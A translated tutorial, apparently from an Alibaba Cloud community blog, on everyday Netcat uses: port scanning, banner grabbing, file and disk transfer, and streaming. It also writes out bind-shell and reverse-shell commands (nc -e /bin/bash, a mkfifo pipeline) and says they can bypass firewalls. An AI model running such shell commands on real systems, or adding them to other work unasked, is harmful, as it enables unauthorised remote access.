Netcat is the Swiss army knife of network tools. It can read and write data in the network using TCP and UDP. Users can use it in a variety of ways in scripts by combining and redirecting with other tools. What can be done with the Netcat command is surprising.
Netcat establishes a link between two computers and returns two data streams. What you can do after that depends on your imagination. You can set up a server, transfer files, chat with friends, transfer streaming media, or use it as a separate client for other protocols.
Here are some examples of using Netcat:
[A(172.31.100.7) B(172.31.100.23)]
The Linux Netcat command instance:
Port scanning is often used by system administrators and hackers to find open ports on some machines to help them identify vulnerabilities in the system.
$nc -z -v -n 172.31.100.7 21-25It can run in TCP or UDP mode. The default is TCP, and the -u parameter is adjusted to UDP.
The z parameter tells Netcat to use 0 IO, close the connection immediately after the connection is established, and do not exchange data.
The v parameter refers to the use of redundant options (verbose output).
The n parameter tells Netcat not to use DNS to reverse query the domain name of an IP address.
This command prints all open ports from 21 to 25. Banner is a text, and banner is a text message sent to you by the service you connect to. Banner information is very useful when you try to identify vulnerabilities or types and versions of services. However, not all services will send banner.
Once you find an open port, you can easily use the Netcat connection service to grab their banner.
$ nc -v 172.31.100.7 21The Netcat command connects to open port 21 and prints the banner information running on this port.
If you want to talk to your friends, there is a lot of software and information services available. However, what if you don't have such a luxurious configuration? For example, if you are in a computer laboratory, and all external connections are restricted, how do you communicate all day with your friends sitting in the next room? Don't be depressed. Netcat offers a method. You need to create a Chat server, a predetermined port, so your friend can contact you.
Server:
$nc -l 1567The Netcat command starts a TCP server on port 1567, and all standard outputs and inputs are output to this port. Both the output and input are displayed in this shell.
Client:
$nc 172.31.100.7 1567Whatever you type on Machine B will appear on Machine A.
Most of the time, we are trying to transfer files using the network or other tools. There are many methods, such as FTP, SCP, and SMB, but when you only need to transfer files temporarily or once, it is not worth wasting time installing and configuring the software to your machine. Let's suppose you want to transfer a file (file.txt) from A to B. Both A and B can be used as the server or client. A will be the server, and B will be the client.
Server:
$nc -l 1567 < file.txtClient:
$nc -n 172.31.100.7 1567 > file.txtHere, we create a server on A and redirect Netcat's input to file.txt. When connected to the port, Netcat will send the file content of the file.
We redirect the output to file.txt on the client side. When B connects to A, A sends the file contents, and B saves the file contents to file.txt.
It is unnecessary to create a file source as a Server. We can also use it in the opposite way. Like the following, we send files from B to A, but the server is created on A. This time, we only need to redirect Netcat's output and redirect B's input file.
B as Server:
Server:
$nc -l 1567 > file.txtClient:
nc 172.31.100.23 1567 < file.txtSending a file is simple, but if we want to send multiple files (or the entire directory), it is as simple. We only need to use the compression tool tar.
Follow the steps below to transfer a directory from A to B using the network.
Server:
$tar -cvf – dir_name | nc -l 1567Client:
$nc -n 172.31.100.7 1567 | tar -xvf –We create a tar archive package on the A server, redirect it using the console, and use the pipeline to redirect to it Netcat, which can send it using the network.
We download the compressed package through the Netcat pipeline and open the file on the client side.
If you want to save bandwidth to transmit compressed packets, you can use bzip2 or other tools to compress them.
Server:
$tar -cvf – dir_name| bzip2 -z | nc -l 1567Compression Using bzip2:
Client:
$nc -n 172.31.100.7 1567 | bzip2 -d |tar -xvf –Decompression Using bzip2.
If you are worried about the security of sending data on the network, you can encrypt your data with a tool (such as mcrypt) before sending it.
Server:
$nc localhost 1567 | mcrypt –flush –bare -F -q -d -m ecb > file.txtUse the mcrypt tool to encrypt data
Client:
$mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 1567Use the mcrypt tool to decrypt data
The preceding two commands will prompt you for a password. Ensure that both ends use the same password.
Here, we use mcrypt for encryption, but any other encryption tool can be used.
This is not the best way to generate streaming video, but there is still hope to make this happen using Netcat if there is no specific tool on the server.
Server:
$cat video.avi | nc -l 1567Here, we just read from a video file and redirect the output to the Netcat client.
$nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 –Here, we read data from the socket and redirect it to mplayer.
You have already installed and configured a Linux machine and need to repeat the same operation on other machines, and you do not want to repeat the configuration. Instead of repeating the configuration and installation process, use some flash drives of another machine to clone your machine.
If your system is on a disk/dev/sda, it is simple to clone Linux PC.
Server:
$dd if=/dev/sda | nc -l 1567Client:
$nc -n 172.31.100.7 1567 | dd of=/dev/sdaThe dd is a tool that reads raw data from a disk. I redirect its output to other machines using the Netcat server and write it to disk. It will copy all the information along with the partition table. However, if we have already partitioned and only need to clone the root partition, we can change sda to sda1 and sda2 according to the location of our system root partition.
We have used remote shells (using telnet and ssh), but if these two commands are not installed, and we do not have permission to install them, we can also use Netcat to create remote shells.
Let's say your Netcat supports the -c -e parameter (default Netcat).
Server:
$nc -l 1567 -e /bin/bash –iClient:
$nc 172.31.100.7 1567Here, we have created a Netcat server and indicated that the /bin/bash will be executed when it connects successfully.
If Netcat does not support the -c or -e parameter (openbsd netcat), we can still create a remote shell.
Server:
$mkfifo /tmp/tmp_fifo
$cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifoHere, we create a fifo file and use the pipeline command to direct the contents of this fifo file to shell 2>&1. It is used to redirect standard error output and standard output and then pipe to port 1567 where Netcat runs. At this point, we have redirected the output of Netcat to the fifo file.
Instructions:
Client:
$nc -n 172.31.100.7 1567You will get a shell prompt on the client.
A reverse shell is a shell that is opened on the client. Reverse shell is named this way because it is unlike other configurations. The server here uses services provided by the customer.
Server:
$nc -l 1567Tell Netcat to execute the shell after the connection is completed on the client side.
Client:
$nc 172.31.100.7 1567 -e /bin/bashWhat is special about reverse shell?
Reverse shell is often used to bypass firewall restrictions, such as blocking inbound connections. For example, I have a private IP address of 172.31.100.7, and I use an agent server to connect to the external network. If I want to access this machine (such as the 1.2.3.4 shell) from outside the network, I will use reverse shell for this purpose.
Assuming that your firewall filters all ports except port 25, you need to use the -p option to specify the source port.
Server:
$nc -l 1567Client:
$nc 172.31.100.7 1567 -p 25Use a port within 1024 requires root permissions
This command will open port 25 on the client for communication. Otherwise, a random port will be used.
Let's suppose your machine has multiple addresses, and you want to specify which address to use for external data communication. We can use the -s option to specify an IP address in Netcat.
Server:
$nc -u -l 1567 < file.txtClient:
$nc -u 172.31.100.7 1567 -s 172.31.100.5 > file.txtThis command binds the address 172.31.100.5.
This is just a few examples of using Netcat.
Other uses include:
As long as you know the protocol, you can use Netcat as a network communication medium to implement various clients.
Disclaimer: This is a translated article from Linux China, all rights reserved to the original author. The views expressed herein are for reference only and don't necessarily represent the official views of Alibaba Cloud.
1,044 posts | 257 followers
FollowXianYu Tech - November 22, 2021
XianYu Tech - December 13, 2021
Alibaba Cloud Community - February 27, 2024
Alibaba Clouder - January 30, 2019
Alibaba Cloud Community - June 6, 2022
Alibaba Clouder - October 12, 2019
1,044 posts | 257 followers
Follow
Web Hosting Solution
Explore Web Hosting solutions that can power your personal website or empower your online business.
Learn More
Alibaba Cloud Linux
Alibaba Cloud Linux is a free-to-use, native operating system that provides a stable, reliable, and high-performance environment for your applications.
Learn More
Accelerated Global Networking Solution for Distance Learning
Alibaba Cloud offers an accelerated global networking solution that makes distance learning just the same as in-class teaching.
Learn More
Networking Overview
Connect your business globally with our stable network anytime anywhere.
Learn MoreMore Posts by Alibaba Cloud Community